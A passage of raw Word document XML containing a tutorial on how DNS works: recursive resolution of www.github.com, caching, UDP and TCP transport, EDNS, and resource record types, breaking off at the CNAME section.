      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0F789" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>I don't know www.github.com, but github.com is handled by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B52C92" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns-421.awsdns-52.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BA2CD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns-1707.awsdns-21.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F214A11" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns-1283.awsdns-32.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2365D7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns-520.awsdns-01.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806AB44" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4c — Query GitHub's Authoritative Nameservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E53875" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The resolver queries GitHub's authoritative nameserver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3916E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF1A41" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Query: "What is the A record for www.github.com?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEFBAB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>GitHub's authoritative nameserver response (</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authoritative answer</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6709909B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD8111" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>www.github.com.  60  IN  A  140.82.121.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D658F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AA flag (Authoritative Answer)</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> is set in this response — signaling this answer comes directly from the zone's authority, not from a cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DE683" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5 — Caching and Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0CE9C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The recursive resolver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC31828" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Caches the answer with its TTL (60 seconds in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23828475" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Also caches the intermediate results (NS records for com., NS records for github.com) with their respective TTLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612052BF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Returns the answer to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301345D9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>The OS caches the answer. The browser caches the answer. The entire process for a cold cache takes </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>~100–300ms</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. For a warm cache (any level), it can be </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;1ms</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B7537" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Full Resolution Flow Visualized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7CA196" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FD2D4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57F8F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  → OS Cache / hosts file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6EF6D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    → Recursive Resolver Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4BFE63" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      → Root Nameservers (a-m.root-servers.net)  [referral: .com NS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B1B57" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">        → .com TLD Nameservers (Verisign)          [referral: github.com NS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304D0B8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">          → github.com Authoritative NS (AWS Route53) [answer: A record]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC7DCD7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">        ← Answer cached at resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FEE36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">      ← Answer cached at OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011259C0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    ← Answer returned to browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809BCD8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  ← TCP connection established to 140.82.121.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E76BF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="2D4D35D2">
          <v:rect id="_x0000_i3170" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E5F3F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. DNS Query Transport — UDP vs TCP Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8AFE7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP by Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE11DB8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP port 53</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for queries. UDP is connectionless — no handshake, no connection state, minimal overhead. A DNS query + response is a single UDP round-trip: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>~1–2ms on a LAN, ~10–50ms across the internet</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333DC56E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A query packet is typically </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>40–100 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. A response for a simple A record is </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100–300 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. This fits easily in a single UDP datagram. No fragmentation needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBDF88" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP timeout and retry:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> If no response within ~2–5 seconds, the resolver retries (possibly to a different nameserver). Resolvers typically have a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>small pool of nameservers</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> per zone and round-robin or pick the fastest one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B44B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When TCP Is Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596FD70" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>falls back to TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> in specific cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8581F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Response too large (TC flag):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> If the authoritative nameserver's response exceeds 512 bytes (traditional limit) or the negotiated EDNS buffer size, it sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TC (TrunCation)</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> flag in the UDP response and sends back a truncated response. The resolver must then </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>retry the query over TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to get the full response. This happens with DNSSEC (cryptographic signatures add significant size), zone transfers, or domains with many records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D69C45" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone transfers (AXFR/IXFR):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> When a secondary nameserver replicates an entire zone from a primary, it uses TCP because the transfer can be megabytes of data — far too large for UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35D2DD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modern DNS (DoT/DoH):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> DNS over TLS (port 853) and DNS over HTTPS (port 443) always use TCP/TLS — see section 11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E75349" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDNS (Extension Mechanisms for DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072D9AE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>EDNS0 (RFC 2671) extends the original DNS protocol. It's specified in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OPT pseudo-record</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> appended to queries. Key capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115D0F7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Larger UDP payloads:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Clients advertise their UDP buffer size (e.g., 4096 bytes). Servers can send larger UDP responses up to this size before truncating. This dramatically reduces TCP fallback for DNSSEC responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE44A9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSSEC OK (DO) bit:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Client signals it can handle DNSSEC records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119CD253" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client Subnet (ECS):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Resolver includes client's IP subnet in queries to authoritative servers, enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>geo-aware responses</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (return a CDN IP close to the client, not close to the resolver). Privacy trade-off: leaks client location to authoritative servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D8634" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="061680A0">
          <v:rect id="_x0000_i3171" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5260BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. DNS Resource Record Types — What They Are and How They Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256296C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Every piece of data in DNS is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource Record (RR)</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Each RR has the format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FEA53" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D670A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Name  TTL  Class  Type  RData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076D242" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The domain the record belongs to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D0FE9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> How long this record can be cached (in seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080820B6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Class:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Always IN (Internet) in practice. Historical artifact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB8909" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The record type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1324EA7A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RData:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The actual data, format varies by type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43F362" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A and AAAA Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCBEC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Map a hostname to an IPv4 (A) or IPv6 (AAAA) address. The most fundamental record type. A domain can have </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple A records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — the DNS response includes all of them, and the client typically </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>round-robins</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> through them (primitive load balancing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8EEF3F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CNAME (Canonical Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D048D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>An alias — maps one name to another name (not directly to an IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032465B3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E3AA7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>blog.example.com.  300  IN  CNAME  example.github.io.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FCDC1C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
